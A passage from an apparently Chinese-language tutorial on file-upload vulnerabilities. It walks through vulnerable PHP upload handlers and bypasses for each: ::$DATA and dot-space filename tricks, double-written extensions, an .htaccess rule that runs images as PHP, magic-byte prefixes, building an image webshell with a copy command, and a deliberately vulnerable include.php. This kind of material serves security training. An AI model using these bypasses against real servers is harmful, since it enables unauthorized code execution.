class="variable">$file_name</span>);<span class="comment">//删除文件名末尾的点</span></span><br><span class="line"> <span class="variable">$file_ext</span> = strrchr(<span class="variable">$file_name</span>, <span class="string">'.'</span>);</span><br><span class="line"> <span class="variable">$file_ext</span> = strtolower(<span class="variable">$file_ext</span>); <span class="comment">//转换为小写</span></span><br><span class="line"> <span class="variable">$file_ext</span> = trim(<span class="variable">$file_ext</span>); <span class="comment">//首尾去空</span></span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span> (!in_array(<span class="variable">$file_ext</span>, <span class="variable">$deny_ext</span>)) {</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">'/'</span>.date(<span class="string">"YmdHis"</span>).rand(<span class="number">1000</span>,<span class="number">9999</span>).<span class="variable">$file_ext</span>;</span><br><span class="line"> <span class="keyword">if</span> (move_uploaded_file(<span class="variable">$temp_file</span>, <span class="variable">$img_path</span>)) {</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'此文件类型不允许上传!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = UPLOAD_PATH . <span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p><strong>绕过方法</strong></p>
<p>以上代码中没有对<code>::$DATA</code>进行处理</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$file_ext</span> = str_ireplace(<span class="string">'::$DATA'</span>, <span class="string">''</span>, <span class="variable">$file_ext</span>);<span class="comment">//去除字符串::$DATA</span></span><br></pre></td></tr></table></figure>
<p>这里我们把上传的文件抓包,在最后添加<code>::$DATA</code>即可绕过,如<code>test.php::$DATA</code></p>
<h5 id="路径拼接绕过"><a href="#路径拼接绕过" class="headerlink" title="路径拼接绕过"></a>路径拼接绕过</h5><p>在代码中,会对文件名进行处理,删除了文件名末尾的点,进行去空处理等,再把处理过的文件名拼接</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (file_exists(UPLOAD_PATH)) {</span><br><span class="line"> <span class="variable">$deny_ext</span> = <span class="keyword">array</span>(<span class="string">".php"</span>,<span class="string">".php5"</span>,<span class="string">".php4"</span>,<span class="string">".php3"</span>,<span class="string">".php2"</span>,<span class="string">".html"</span>,<span class="string">".htm"</span>,<span class="string">".phtml"</span>,<span class="string">".pht"</span>,<span class="string">".pHp"</span>,<span class="string">".pHp5"</span>,<span class="string">".pHp4"</span>,<span class="string">".pHp3"</span>,<span class="string">".pHp2"</span>,<span class="string">".Html"</span>,<span class="string">".Htm"</span>,<span class="string">".pHtml"</span>,<span class="string">".jsp"</span>,<span class="string">".jspa"</span>,<span class="string">".jspx"</span>,<span class="string">".jsw"</span>,<span class="string">".jsv"</span>,<span class="string">".jspf"</span>,<span class="string">".jtml"</span>,<span class="string">".jSp"</span>,<span class="string">".jSpx"</span>,<span class="string">".jSpa"</span>,<span class="string">".jSw"</span>,<span class="string">".jSv"</span>,<span class="string">".jSpf"</span>,<span class="string">".jHtml"</span>,<span class="string">".asp"</span>,<span class="string">".aspx"</span>,<span class="string">".asa"</span>,<span class="string">".asax"</span>,<span class="string">".ascx"</span>,<span class="string">".ashx"</span>,<span class="string">".asmx"</span>,<span class="string">".cer"</span>,<span class="string">".aSp"</span>,<span class="string">".aSpx"</span>,<span class="string">".aSa"</span>,<span class="string">".aSax"</span>,<span class="string">".aScx"</span>,<span class="string">".aShx"</span>,<span class="string">".aSmx"</span>,<span class="string">".cEr"</span>,<span class="string">".sWf"</span>,<span class="string">".swf"</span>,<span class="string">".htaccess"</span>);</span><br><span class="line"> <span class="variable">$file_name</span> = trim(<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>]);</span><br><span class="line"> <span class="variable">$file_name</span> = deldot(<span class="variable">$file_name</span>);<span class="comment">//删除文件名末尾的点</span></span><br><span class="line"> <span class="variable">$file_ext</span> = strrchr(<span class="variable">$file_name</span>, <span class="string">'.'</span>);</span><br><span class="line"> <span class="variable">$file_ext</span> = strtolower(<span class="variable">$file_ext</span>); <span class="comment">//转换为小写</span></span><br><span class="line"> <span class="variable">$file_ext</span> = str_ireplace(<span class="string">'::$DATA'</span>, <span class="string">''</span>, <span class="variable">$file_ext</span>);<span class="comment">//去除字符串::$DATA</span></span><br><span class="line"> <span class="variable">$file_ext</span> = trim(<span class="variable">$file_ext</span>); <span class="comment">//首尾去空</span></span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span> (!in_array(<span class="variable">$file_ext</span>, <span class="variable">$deny_ext</span>)) {</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">'/'</span>.<span class="variable">$file_name</span>;</span><br><span class="line"> <span class="keyword">if</span> (move_uploaded_file(<span class="variable">$temp_file</span>, <span class="variable">$img_path</span>)) {</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'此文件类型不允许上传!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = UPLOAD_PATH . <span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p><strong>绕过方法</strong></p>
<p>这里我们构造文件名<code>test.php. .</code>(点+空格+点),经过处理后。文件名变成<code>test.php.</code>,即可绕过</p>
<h5 id="双写绕过"><a href="#双写绕过" class="headerlink" title="双写绕过"></a>双写绕过</h5><p>代码会将不符合的文件名和扩展名进行去除</p>
<p>例如<code>test.php</code>会变成<code>test.</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (file_exists(UPLOAD_PATH)) {</span><br><span class="line"> <span class="variable">$deny_ext</span> = <span class="keyword">array</span>(<span class="string">"php"</span>,<span class="string">"php5"</span>,<span class="string">"php4"</span>,<span class="string">"php3"</span>,<span class="string">"php2"</span>,<span class="string">"html"</span>,<span class="string">"htm"</span>,<span class="string">"phtml"</span>,<span class="string">"pht"</span>,<span class="string">"jsp"</span>,<span class="string">"jspa"</span>,<span class="string">"jspx"</span>,<span class="string">"jsw"</span>,<span class="string">"jsv"</span>,<span class="string">"jspf"</span>,<span class="string">"jtml"</span>,<span class="string">"asp"</span>,<span class="string">"aspx"</span>,<span class="string">"asa"</span>,<span class="string">"asax"</span>,<span class="string">"ascx"</span>,<span class="string">"ashx"</span>,<span class="string">"asmx"</span>,<span class="string">"cer"</span>,<span class="string">"swf"</span>,<span class="string">"htaccess"</span>);</span><br><span class="line"></span><br><span class="line"> <span class="variable">$file_name</span> = trim(<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>]);</span><br><span class="line"> <span class="variable">$file_name</span> = str_ireplace(<span class="variable">$deny_ext</span>,<span class="string">""</span>, <span class="variable">$file_name</span>);</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">'/'</span>.<span class="variable">$file_name</span>; </span><br><span class="line"> <span class="keyword">if</span> (move_uploaded_file(<span class="variable">$temp_file</span>, <span class="variable">$img_path</span>)) {</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = UPLOAD_PATH . <span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p><strong>绕过方法</strong></p>
<p>我们这里构造文件名为<code>test.pphphp</code>,这样消除之后就会变成<code>test.php</code>,会把所有带php的文件名和扩展名进行消除</p>
<h5 id="上传-htaccess"><a href="#上传-htaccess" class="headerlink" title="上传.htaccess"></a>上传.htaccess</h5><p> .htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过 .htaccess文件,可以实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能IIS平台上不存在该文件,该文件默认开启,启用和关闭在 httpd.conf 文件中配置</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (file_exists(UPLOAD_PATH)) {</span><br><span class="line"> <span class="variable">$deny_ext</span> = <span class="keyword">array</span>(<span class="string">".php"</span>,<span class="string">".php5"</span>,<span class="string">".php4"</span>,<span class="string">".php3"</span>,<span class="string">".php2"</span>,<span class="string">"php1"</span>,<span class="string">".html"</span>,<span class="string">".htm"</span>,<span class="string">".phtml"</span>,<span class="string">".pht"</span>,<span class="string">".pHp"</span>,<span class="string">".pHp5"</span>,<span class="string">".pHp4"</span>,<span class="string">".pHp3"</span>,<span class="string">".pHp2"</span>,<span class="string">"pHp1"</span>,<span class="string">".Html"</span>,<span class="string">".Htm"</span>,<span class="string">".pHtml"</span>,<span class="string">".jsp"</span>,<span class="string">".jspa"</span>,<span class="string">".jspx"</span>,<span class="string">".jsw"</span>,<span class="string">".jsv"</span>,<span class="string">".jspf"</span>,<span class="string">".jtml"</span>,<span class="string">".jSp"</span>,<span class="string">".jSpx"</span>,<span class="string">".jSpa"</span>,<span class="string">".jSw"</span>,<span class="string">".jSv"</span>,<span class="string">".jSpf"</span>,<span class="string">".jHtml"</span>,<span class="string">".asp"</span>,<span class="string">".aspx"</span>,<span class="string">".asa"</span>,<span class="string">".asax"</span>,<span class="string">".ascx"</span>,<span class="string">".ashx"</span>,<span class="string">".asmx"</span>,<span class="string">".cer"</span>,<span class="string">".aSp"</span>,<span class="string">".aSpx"</span>,<span class="string">".aSa"</span>,<span class="string">".aSax"</span>,<span class="string">".aScx"</span>,<span class="string">".aShx"</span>,<span class="string">".aSmx"</span>,<span class="string">".cEr"</span>,<span class="string">".sWf"</span>,<span class="string">".swf"</span>);</span><br><span class="line"> <span class="variable">$file_name</span> = trim(<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>]);</span><br><span class="line"> <span class="variable">$file_name</span> = deldot(<span class="variable">$file_name</span>);<span class="comment">//删除文件名末尾的点</span></span><br><span class="line"> <span class="variable">$file_ext</span> = strrchr(<span class="variable">$file_name</span>, <span class="string">'.'</span>);</span><br><span class="line"> <span class="variable">$file_ext</span> = strtolower(<span class="variable">$file_ext</span>); <span class="comment">//转换为小写</span></span><br><span class="line"> <span class="variable">$file_ext</span> = str_ireplace(<span class="string">'::$DATA'</span>, <span class="string">''</span>, <span class="variable">$file_ext</span>);<span class="comment">//去除字符串::$DATA</span></span><br><span class="line"> <span class="variable">$file_ext</span> = trim(<span class="variable">$file_ext</span>); <span class="comment">//收尾去空</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (!in_array(<span class="variable">$file_ext</span>, <span class="variable">$deny_ext</span>)) {</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">'/'</span>.date(<span class="string">"YmdHis"</span>).rand(<span class="number">1000</span>,<span class="number">9999</span>).<span class="variable">$file_ext</span>;</span><br><span class="line"> <span class="keyword">if</span> (move_uploaded_file(<span class="variable">$temp_file</span>, <span class="variable">$img_path</span>)) {</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'此文件不允许上传!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = UPLOAD_PATH . <span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p><strong>绕过方法</strong></p>
<p>服务器禁止了几乎所有的类型文件的后缀,可以通过.htaccess解析进行绕过</p>
<p>上传.htaccess文件,.htaccess文件代码如下</p>
<p>下面代码说明服务器解析1.jpg文件当作php运行,也可以不加1.jpg</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><FilesMatch "1.jpg"> </span><br><span class="line">SetHandler application/x-httpd-php </span><br><span class="line"></FilesMatchc></span><br></pre></td></tr></table></figure>
<p>当把有如上代码的.htaccess文件上传,在上传有木马代码的1.jpg文件上传,即可使用工具链接</p>
<h3 id="检查内容"><a href="#检查内容" class="headerlink" title="检查内容"></a>检查内容</h3><h4 id="文件头检查"><a href="#文件头检查" class="headerlink" title="文件头检查"></a>文件头检查</h4><p>这里主要对文件的前两个字节来判断文件的上传类型</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">getReailFileType</span>(<span class="params"><span class="variable">$filename</span></span>)</span>{</span><br><span class="line"> <span class="variable">$file</span> = fopen(<span class="variable">$filename</span>, <span class="string">"rb"</span>);</span><br><span class="line"> <span class="variable">$bin</span> = fread(<span class="variable">$file</span>, <span class="number">2</span>); <span class="comment">//只读2字节</span></span><br><span class="line"> fclose(<span class="variable">$file</span>);</span><br><span class="line"> <span class="variable">$strInfo</span> = @unpack(<span class="string">"C2chars"</span>, <span class="variable">$bin</span>); </span><br><span class="line"> <span class="variable">$typeCode</span> = intval(<span class="variable">$strInfo</span>[<span class="string">'chars1'</span>].<span class="variable">$strInfo</span>[<span class="string">'chars2'</span>]); </span><br><span class="line"> <span class="variable">$fileType</span> = <span class="string">''</span>; </span><br><span class="line"> <span class="keyword">switch</span>(<span class="variable">$typeCode</span>){ </span><br><span class="line"> <span class="keyword">case</span> <span class="number">255216</span>: </span><br><span class="line"> <span class="variable">$fileType</span> = <span class="string">'jpg'</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> <span class="number">13780</span>: </span><br><span class="line"> <span class="variable">$fileType</span> = <span class="string">'png'</span>;</span><br><span class="line"> <span class="keyword">break</span>; </span><br><span class="line"> <span class="keyword">case</span> <span class="number">7173</span>: </span><br><span class="line"> <span class="variable">$fileType</span> = <span class="string">'gif'</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">default</span>: </span><br><span class="line"> <span class="variable">$fileType</span> = <span class="string">'unknown'</span>;</span><br><span class="line"> } </span><br><span class="line"> <span class="keyword">return</span> <span class="variable">$fileType</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])){</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$file_type</span> = getReailFileType(<span class="variable">$temp_file</span>);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$file_type</span> == <span class="string">'unknown'</span>){</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"文件未知,上传失败!"</span>;</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">"/"</span>.rand(<span class="number">10</span>, <span class="number">99</span>).date(<span class="string">"YmdHis"</span>).<span class="string">"."</span>.<span class="variable">$file_type</span>;</span><br><span class="line"> <span class="keyword">if</span>(move_uploaded_file(<span class="variable">$temp_file</span>,<span class="variable">$img_path</span>)){</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"上传出错!"</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>主要是检测文件内容开始处的文件幻数,比如图片类型的文件幻数如下,</p>
<p>要绕过jpg文件幻数检测就要在文件开头写上下图的值:</p>
<p>Value = FF D8 FF E0 00 10 4A 46 49 46</p>
<p><img src="https://upload-images.jianshu.io/upload_images/15378294-c22107455ddd7217.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/639/format/webp"></p>
<p>要绕过gif 文件幻数检测就要在文件开头写上下图的值</p>
<p>Value = 47 49 46 38 39 61</p>
<p><img src="https://upload-images.jianshu.io/upload_images/15378294-5b20d65ed7622052.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/607/format/webp"><br>要绕过png 文件幻数检测就要在文件开头写上下面的值</p>
<p>Value = 89 50 4E 47</p>
<p><img src="https://upload-images.jianshu.io/upload_images/15378294-d22290e70f64e241.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/589/format/webp"></p>
<p>然后在文件幻数后面加上自己的一句话木马代码就行了</p>
<p><strong>绕过方法</strong></p>
<p>准备一张普通的图片和一句话木马</p>
<p>在命令控制行输入以下命令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">copy image.jpg/b+test.php/a test.png</span><br></pre></td></tr></table></figure>
<p>生成的test.png就是我们制作好的图片马,上传即可</p>
<p>利用文件包含执行php代码</p>
<p>include.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">本页面存在文件包含漏洞,用于测试图片马是否能正常运行!</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line">header(<span class="string">"Content-Type:text/html;charset=utf-8"</span>);</span><br><span class="line"><span class="variable">$file</span> = <span class="variable">$_GET</span>[<span class="string">'file'</span>];</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$file</span>)){</span><br><span class="line"> <span class="keyword">include</span> <span class="variable">$file</span>;</span><br><span class="line">}<span class="keyword">else</span>{</span><br><span class="line"> show_source(<span class="keyword">__file__</span>);</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/include.php?file=upload/xxx.jpg</span><br></pre></td></tr></table></figure>
<h4 id="突破getimagesize"><a href="#突破getimagesize" class="headerlink" title="突破getimagesize()"></a>突破getimagesize()</h4><p>通过<code>getimagesize()</code>函数获取文件类型</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">function isImage($filename){</span><br><span class="line"> $types = '.jpeg|.png|.gif';</span><br><span class="line"> if(file_exists($filename)){</span><br><span class="line"> $info = getimagesize($filename);</span><br><span class="line"> $ext = image_type_to_extension($info[2]);</span><br><span class="line"> if(stripos($types,$ext)>=0){</span><br><span class="line"> return $ext;</span><br><span class="line"> }else{</span><br><span class="line"> return false;</span><br><span class="line"> }</span><br><span class="line"> }else{</span><br><span class="line"> return false;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">$is_upload = false;</span><br><span class="line">$msg = null;</span><br><span class="line">if(isset($_POST['submit'])){</span><br><span class="line"> $temp_file = $_FILES['upload_file']['tmp_name'];</span><br><span class="line"> $res = isImage($temp_file);</span><br><span class="line"> if(!$res){</span><br><span class="line"> $msg = "文件未知,上传失败!";</span><br><span class="line"> }else{</span><br><span class="line"> $img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").$res;</span><br><span class="line"> if(move_uploaded_file($temp_file,$img_path)){</span><br><span class="line"> $is_upload = true;</span><br><span class="line"> } else {</span><br><span class="line"> $msg = "上传出错!";</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p><strong>绕过方法</strong></p>
<p>准备一张普通的图片和一句话木马</p>
<p>在命令控制行输入以下命令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">copy image.jpg/b+test.php/a test.png</span><br></pre></td></tr></table></figure>
<p>生成的test.png就是我们制作好的图片马,上传即可</p>
<p>利用文件包含执行php代码</p>
<p>include.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">本页面存在文件包含漏洞,用于测试图片马是否能正常运行!</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line">header(<span class="string">"Content-Type:text/html;charset=utf-8"</span>);</span><br><span class="line"><span class="variable">$file</span> = <span class="variable">$_GET</span>[<span class="string">'file'</span>];</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$file</span>)){</span><br><span class="line"> <span class="keyword">include</span> <span class="variable">$file</span>;</span><br><span class="line">}<span class="keyword">else</span>{</span><br><span class="line"> show_source(<span class="keyword">__file__</span>);</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/include.php?file=upload/xxx.jpg</span><br></pre></td></tr></table></figure>
<h4 id="突破exif-imagetype"><a href="#突破exif-imagetype" class="headerlink" title="突破exif_imagetype()"></a>突破exif_imagetype()</h4><p>通过exif模块检测文件的类型</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">isImage</span>(<span class="params"><span class="variable">$filename</span></span>)</span>{</span><br><span class="line"> <span class="comment">//需要开启php_exif模块</span></span><br><span class="line"> <span class="variable">$image_type</span> = exif_imagetype(<span class="variable">$filename</span>);</span><br><span class="line"> <span class="keyword">switch</span> (<span class="variable">$image_type</span>) {</span><br><span class="line"> <span class="keyword">case</span> IMAGETYPE_GIF:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">"gif"</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> IMAGETYPE_JPEG:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">"jpg"</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> IMAGETYPE_PNG:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">"png"</span>;</span><br><span class="line"> <span class="keyword">break</span>; </span><br><span class="line"> <span class="keyword">default</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="variable">$is_upload</span> = 